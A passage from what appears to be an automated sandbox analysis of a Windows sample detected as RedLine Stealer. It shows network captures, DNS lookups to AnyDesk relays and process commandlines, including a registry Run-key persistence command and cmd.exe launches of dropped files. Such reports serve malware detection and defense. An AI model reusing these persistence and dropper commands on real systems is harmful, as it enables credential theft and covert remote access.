                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280471087 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280596972 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280662060 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280673027 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280682087 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280736923 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280795097 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280837059 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280901909 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.280934095 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.281035900 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.281045914 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.281255007 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.439565897 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.439578056 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.439588070 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.439603090 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440068007 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440157890 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440201998 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440248966 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440355062 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440391064 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440402031 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440911055 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.440982103 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.441047907 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.441138983 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.445065022 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.491262913 CET497382909192.168.2.467.203.7.148
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.502871037 CET497382909192.168.2.467.203.7.148
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.662947893 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.671061039 CET497382909192.168.2.467.203.7.148
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.830276966 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.830291033 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.832098961 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.837244987 CET497382909192.168.2.467.203.7.148
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.997529984 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:25.998867989 CET497382909192.168.2.467.203.7.148
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:26.158703089 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:26.163130999 CET497382909192.168.2.467.203.7.148
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:26.323343039 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:26.329472065 CET497382909192.168.2.467.203.7.148
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:26.428814888 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:26.511672974 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:26.512386084 CET497382909192.168.2.467.203.7.148
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:26.516129971 CET804973464.31.23.26192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:26.677630901 CET29094973867.203.7.148192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:26.725656986 CET497382909192.168.2.467.203.7.148
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:26.734884977 CET497382909192.168.2.467.203.7.148
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:36.522574902 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:36.610439062 CET804973464.31.23.26192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:46.616291046 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:46.703919888 CET804973464.31.23.26192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:56.710043907 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:56.727482080 CET804973464.31.23.26192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:56.727552891 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:56.797538042 CET804973464.31.23.26192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:06.803858042 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:06.891196012 CET804973464.31.23.26192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:16.897587061 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:16.953655005 CET804973464.31.23.26192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:16.953720093 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:16.985359907 CET804973464.31.23.26192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:26.991426945 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:27.078917027 CET804973464.31.23.26192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:37.085095882 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:37.172940016 CET804973464.31.23.26192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:47.179029942 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:47.266450882 CET804973464.31.23.26192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:57.272582054 CET4973480192.168.2.464.31.23.26
                                                                                                                                                                                                                                                Mar 3, 2024 13:33:57.360001087 CET804973464.31.23.26192.168.2.4

                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:02.681746960 CET5472253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:02.770494938 CET53547221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:03.912434101 CET5296653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.001440048 CET53529661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:06.505379915 CET5505153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:06.619204044 CET53550511.1.1.1192.168.2.4

                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:02.681746960 CET192.168.2.41.1.1.10xa6f1Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:03.912434101 CET192.168.2.41.1.1.10x817bStandard query (0)relay-6a630189.net.anydesk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:06.505379915 CET192.168.2.41.1.1.10xbb09Standard query (0)api.playanext.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:02.770494938 CET1.1.1.1192.168.2.40xa6f1No error (0)boot.net.anydesk.com185.229.191.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.001440048 CET1.1.1.1192.168.2.40x817bNo error (0)relay-6a630189.net.anydesk.com64.31.23.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:06.619204044 CET1.1.1.1192.168.2.40xbb09No error (0)api.playanext.comd1atxff5avezsq.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:06.619204044 CET1.1.1.1192.168.2.40xbb09No error (0)d1atxff5avezsq.cloudfront.net18.173.219.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:06.619204044 CET1.1.1.1192.168.2.40xbb09No error (0)d1atxff5avezsq.cloudfront.net18.173.219.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:06.619204044 CET1.1.1.1192.168.2.40xbb09No error (0)d1atxff5avezsq.cloudfront.net18.173.219.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:06.619204044 CET1.1.1.1192.168.2.40xbb09No error (0)d1atxff5avezsq.cloudfront.net18.173.219.85A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                • api.playanext.comuser-agent: anydesk

                                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.449732185.229.191.44805768C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:03.346771002 CET273OUTData Raw: 16 03 01 01 0c 01 00 01 08 03 03 de 8c c2 6e 8d a8 9c 76 2c 75 c5 7c 03 89 1a 2b 87 50 1f 94 62 52 97 b9 ea ab 2f a2 3e 61 59 57 00 00 6e c0 30 c0 2c c0 28 c0 24 c0 14 c0 0a 00 a5 00 a3 00 a1 00 9f 00 6b 00 6a 00 69 00 68 00 39 00 38 00 37 00 36
                                                                                                                                                                                                                                                Data Ascii: nv,u|+PbR/>aYWn0,($kjih98762.*&=5/+'#g@?>32101-)%</q#
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:03.512047052 CET1286INData Raw: 16 03 03 00 57 02 00 00 53 03 03 55 cb 99 5e f4 32 7c 6a a7 82 d7 fb 81 6b f7 5d 8f 0f 9c 43 52 25 f6 81 44 4f 57 4e 47 52 44 01 20 21 87 53 21 f4 0b b2 d1 97 43 3b de df cb 5f 11 d5 65 29 0a cb 09 4c 19 f3 dd c1 26 08 f0 78 63 c0 2c 00 00 0b ff
                                                                                                                                                                                                                                                Data Ascii: WSU^2|jk]CR%DOWNGRD !S!C;_e)L&xc,C0?0'0vtS$0*H0H10UAnyNet Root CA1 0Uphilandro Software GmbH10UDE0181118021423Z281115021
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:03.512124062 CET1286INData Raw: 5a eb 51 2f 97 bf f6 fb 33 27 90 b3 d8 e4 e0 cd 68 3b 6a 87 6c a6 0d e7 d8 bd 61 df 56 6b 2a e1 1c 2b f5 9f bf 85 dd 8c 5b 06 1e 71 7f ba 4a a6 40 b0 77 17 ea 2c 3f 5b 94 14 85 2e ad 11 61 ab 88 f6 01 bb b3 47 6b e2 81 18 f1 8e 39 e6 d8 7b 0c 63
                                                                                                                                                                                                                                                Data Ascii: ZQ/3'h;jlaVk*+[qJ@w,?[.aGk9{cpu'-5={{Hy8-&~K2vf/bj@kXScuxI#ph3/L^}a}4AkP+g_R4gs@lo67Jv"rR}uMU#[~.K_e
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:03.512283087 CET45INData Raw: 70 68 69 6c 61 6e 64 72 6f 20 53 6f 66 74 77 61 72 65 20 47 6d 62 48 31 0b 30 09 06 03 55 04 06 13 02 44 45 16 03 03 00 04 0e 00 00 00
                                                                                                                                                                                                                                                Data Ascii: philandro Software GmbH10UDE
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:03.522396088 CET1094OUTData Raw: 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 82 02 a8 30 82 01 90 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 19 31 17 30 15 06 03 55 04 03 0c 0e 41 6e 79 44 65 73 6b 20 43 6c 69 65 6e 74 30 20 17 0d 32 34 30 33 30 33 31 32 33 32
                                                                                                                                                                                                                                                Data Ascii: 000*H010UAnyDesk Client0 240303123202Z20740219123202Z010UAnyDesk Client0"0*H0.Di{&q\/K].$Afv1S!=}D,**&4@M)1h
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:03.685847998 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 02 22 e9 f8 ea dd ae e5 22 71 35 86 16 f7 14 4d 17 0f ad 8c d4 f8 d0 86 a3 36 77 a1 bf 06 ca e0 c7 69 b9 55 64 42 7f 49
                                                                                                                                                                                                                                                Data Ascii: (""q5M6wiUdBI
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:03.685923100 CET40INData Raw: 17 03 03 00 23 02 22 e9 f8 ea dd ae e6 ab f3 41 36 e4 2b 19 8e 7a 5f db 47 0c fa 18 38 23 f6 fd 79 da 9d bc 76 f2 9b 57
                                                                                                                                                                                                                                                Data Ascii: #"A6+z_G8#yvW
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:03.691401958 CET92OUTData Raw: 17 03 03 00 57 33 cb 0f e1 b0 45 07 e5 19 c6 a4 05 a3 6d cf 15 dc 27 e4 eb f6 c2 98 97 f9 5e 5e fa 5c ad f0 f0 0c d4 34 6e a1 bf a3 3b f4 c8 ac 21 13 fa 0e 60 26 a6 df 39 c0 ef 93 b4 82 0a 44 6c 7e 57 ec ba 49 17 41 a3 89 e4 9e f4 08 5e ca a7 6a
                                                                                                                                                                                                                                                Data Ascii: W3Em'^^\4n;!`&9Dl~WIA^j2]y
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:03.853558064 CET425INData Raw: 17 03 03 01 a4 02 22 e9 f8 ea dd ae e7 0d e4 e5 02 eb cc a8 29 8c 07 a3 93 a4 9f d5 cd 68 47 f3 ff fa f8 0e 2b c9 5a 47 b7 9f 1b 49 9d 74 9c ed aa c3 b4 25 d4 5b 47 5b fc c7 f2 4a 4e 17 5e bc 6f a9 c7 17 44 cf 32 33 54 6d a5 4d 3d 0e 3b 31 80 73
                                                                                                                                                                                                                                                Data Ascii: ")hG+ZGIt%[G[JN^oD23TmM=;1sh@$" -9Vo:^M:id3_-`\~J}D=$O,`)4N3srcBYB;<;37x P[89fR\O9+?R(36S Z\4HE


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.44973464.31.23.26805768C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.345815897 CET273OUTData Raw: 16 03 01 01 0c 01 00 01 08 03 03 61 e1 84 e0 ba 56 30 cb 76 16 13 b6 c2 ea d0 c0 df 56 96 24 23 b5 9d 97 59 e7 2d 42 60 b2 d0 de 00 00 6e c0 30 c0 2c c0 28 c0 24 c0 14 c0 0a 00 a5 00 a3 00 a1 00 9f 00 6b 00 6a 00 69 00 68 00 39 00 38 00 37 00 36
                                                                                                                                                                                                                                                Data Ascii: aV0vV$#Y-B`n0,($kjih98762.*&=5/+'#g@?>32101-)%</q#
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.435259104 CET1286INData Raw: 16 03 03 00 57 02 00 00 53 03 03 cf 5a 68 45 6b 0f 45 5b c3 70 69 a3 5b b7 67 30 fb 13 01 79 a0 92 2a 1b 44 4f 57 4e 47 52 44 01 20 f0 c0 eb 3e e7 53 26 32 ab 81 43 9a d1 e8 36 9d 27 32 55 f7 55 80 ae ef 15 d6 8b 86 1a 96 b1 c8 c0 2c 00 00 0b ff
                                                                                                                                                                                                                                                Data Ascii: WSZhEkE[pi[g0y*DOWNGRD >S&2C6'2UU,C0?0'0vtS$0*H0H10UAnyNet Root CA1 0Uphilandro Software GmbH10UDE0181118021423Z281115021
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.435281992 CET1286INData Raw: 5a eb 51 2f 97 bf f6 fb 33 27 90 b3 d8 e4 e0 cd 68 3b 6a 87 6c a6 0d e7 d8 bd 61 df 56 6b 2a e1 1c 2b f5 9f bf 85 dd 8c 5b 06 1e 71 7f ba 4a a6 40 b0 77 17 ea 2c 3f 5b 94 14 85 2e ad 11 61 ab 88 f6 01 bb b3 47 6b e2 81 18 f1 8e 39 e6 d8 7b 0c 63
                                                                                                                                                                                                                                                Data Ascii: ZQ/3'h;jlaVk*+[qJ@w,?[.aGk9{cpu'-5={{Hy8-&~K2vf/bj@kXScuxI#ph3/L^}a}4AkP+g_R4gs@lo67Jv"rR}uMU#[~.K_e
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.435296059 CET44INData Raw: 68 69 6c 61 6e 64 72 6f 20 53 6f 66 74 77 61 72 65 20 47 6d 62 48 31 0b 30 09 06 03 55 04 06 13 02 44 45 16 03 03 00 04 0e 00 00 00
                                                                                                                                                                                                                                                Data Ascii: hilandro Software GmbH10UDE
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.445707083 CET1094OUTData Raw: 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 82 02 a8 30 82 01 90 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 19 31 17 30 15 06 03 55 04 03 0c 0e 41 6e 79 44 65 73 6b 20 43 6c 69 65 6e 74 30 20 17 0d 32 34 30 33 30 33 31 32 33 32
                                                                                                                                                                                                                                                Data Ascii: 000*H010UAnyDesk Client0 240303123202Z20740219123202Z010UAnyDesk Client0"0*H0.Di{&q\/K].$Afv1S!=}D,**&4@M)1h
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.534045935 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 4a fc 8a fc 0f de 92 58 70 a5 c9 90 04 74 bb b6 84 95 09 3c 65 2c e5 a9 2a ba 1e fe f9 68 f1 c9 5b d3 49 e4 e0 d3 3f d3
                                                                                                                                                                                                                                                Data Ascii: (JXpt<e,*h[I?
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.534060955 CET40INData Raw: 17 03 03 00 23 4a fc 8a fc 0f de 92 59 60 10 fa 5d 98 18 6c 0f e2 a3 ae e6 3e 2e 00 43 b9 a9 38 19 3e 27 db d6 48 74 04
                                                                                                                                                                                                                                                Data Ascii: #JY`]l>.C8>'Ht
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.541076899 CET92OUTData Raw: 17 03 03 00 57 65 65 36 55 dc af b6 32 af 22 e3 f8 fb ad 95 83 71 ff 0b 06 e2 7b 7a 39 51 11 1a 19 35 c6 00 3a f6 c3 03 7d ae 7d 07 c6 f5 8c 4c 92 5b 16 ec 76 14 16 08 51 24 70 ab 70 a7 33 54 d2 4f b0 20 18 32 48 bf 2e 48 ec ae 1e d5 82 29 d8 b4
                                                                                                                                                                                                                                                Data Ascii: Wee6U2"q{z9Q5:}}L[vQ$pp3TO 2H.H)lp6
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.893749952 CET146INData Raw: 17 03 03 00 8d 4a fc 8a fc 0f de 92 5a b4 08 43 1b 51 5b 42 29 c7 fd b0 4b 4e 63 78 30 3d 4a b3 0e 99 b2 1f 52 4c be b5 cc c7 1c cb 9e be 3b 45 98 d3 79 27 26 ed 93 c6 ad a8 2d b1 5c f7 d3 d3 f7 9c 63 d9 68 69 43 49 5c cb 2a 4a e5 6f bb 3d c4 40
                                                                                                                                                                                                                                                Data Ascii: JZCQ[B)KNcx0=JRL;Ey'&-\chiCI\*Jo=@/rx`Ww-=,#yLcNzg4F'qfrz6#
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:04.928443909 CET576OUTData Raw: 17 03 03 02 3b 65 65 36 55 dc af b6 33 ca 5d 29 1b ab e9 94 a2 5a 75 a7 23 ca 6b ea 5b b9 06 22 5c c4 23 03 05 de cc 5a 1d ec e4 46 b9 4e 39 1d 5d 65 94 21 49 b3 6a cb 91 a4 5d 06 0e d5 a8 34 5b 44 bf 6f 87 cc c3 76 6a b5 f5 c5 5d ed 32 91 69 5f
                                                                                                                                                                                                                                                Data Ascii: ;ee6U3])Zu#k["\#ZFN9]e!Ij]4[Dovj]2i_nr68|I56f<O0%y9T$@\<l\8^].UjRlsac|/nIF:? .%L--OgC%:jv~B-uZ,


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                2192.168.2.44973518.173.219.85805768C:\ProgramData\WinNet\AnyDesk.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:06.722198963 CET506OUTPOST /httpapi HTTP/1.1Host: api.playanext.comUser-Agent: AnyDesk/8.0.8Accept: */*Content-Length: 352Content-Type: application/x-www-form-urlencodedapi_key=c1426bd258099fa69f62933b466d4b77&event=[{"event_type":"check_offer","user_id":"f9be650e732b28999541a3d29be8e5d3","session_id":1709469125922881,"ip":"$remote","event_properties":{"method_used":"Google Chrome Criteria Checker","offer_product":"Google Chrome","distributor":"AnyDesk","distributor_product":"AnyDesk","user_country":"Switzerland"}}
                                                                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Mar 3, 2024 13:32:06.861197948 CET620INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Date: Sun, 03 Mar 2024 12:32:06 GMT
                                                                                                                                                                                                                                                x-amzn-RequestId: 89e3f0f8-1129-4e6e-9c17-5612a2ba27e8
                                                                                                                                                                                                                                                x-amz-apigw-id: UDYXGHe0IAMEFng=
                                                                                                                                                                                                                                                X-Amzn-Trace-Id: Root=1-65e46dc6-2a2d5d325272d89f77cb4c32;Parent=2c124bee24531184;Sampled=0;lineage=d7502c8f:0
                                                                                                                                                                                                                                                Via: 1.1 acbc16f609c0c9804b8a2c3d38d3023e.cloudfront.net (CloudFront), 1.1 39cd5ffcd7df50a48d03f7c7f50d3d1a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK52-P4
                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                                                                                                X-Amz-Cf-Id: xjKEer1d96Nn56wkkiggsRZ9j7at2wY54L0iiic3ZvfZ2ADAGtD6uQ==


                                                                                                                                                                                                                                                Statistics

                                                                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                Behavior

                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                Start time:13:31:55
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\SysrI6zSkJ.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\SysrI6zSkJ.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff6f6b40000
                                                                                                                                                                                                                                                File size:21'906'944 bytes
                                                                                                                                                                                                                                                MD5 hash:2E501240EC8B9AAB46D76A6504E44882
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2883966376.00000231D8F00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff628e90000
                                                                                                                                                                                                                                                File size:77'312 bytes
                                                                                                                                                                                                                                                MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:cmd.exe /c C:\ProgramData\WinNet\embedded.exe
                                                                                                                                                                                                                                                Imagebase:0x7ff618ed0000
                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                                                                Start time:13:31:56
                                                                                                                                                                                                                                                Start date:03/03/2024
                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                Commandline:cmd.exe /c C:\ProgramData\WinNet\p.vbs
                                                                                                                                                                                                                                                Imagebase:0x7ff618ed0000
                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                                Target ID:5
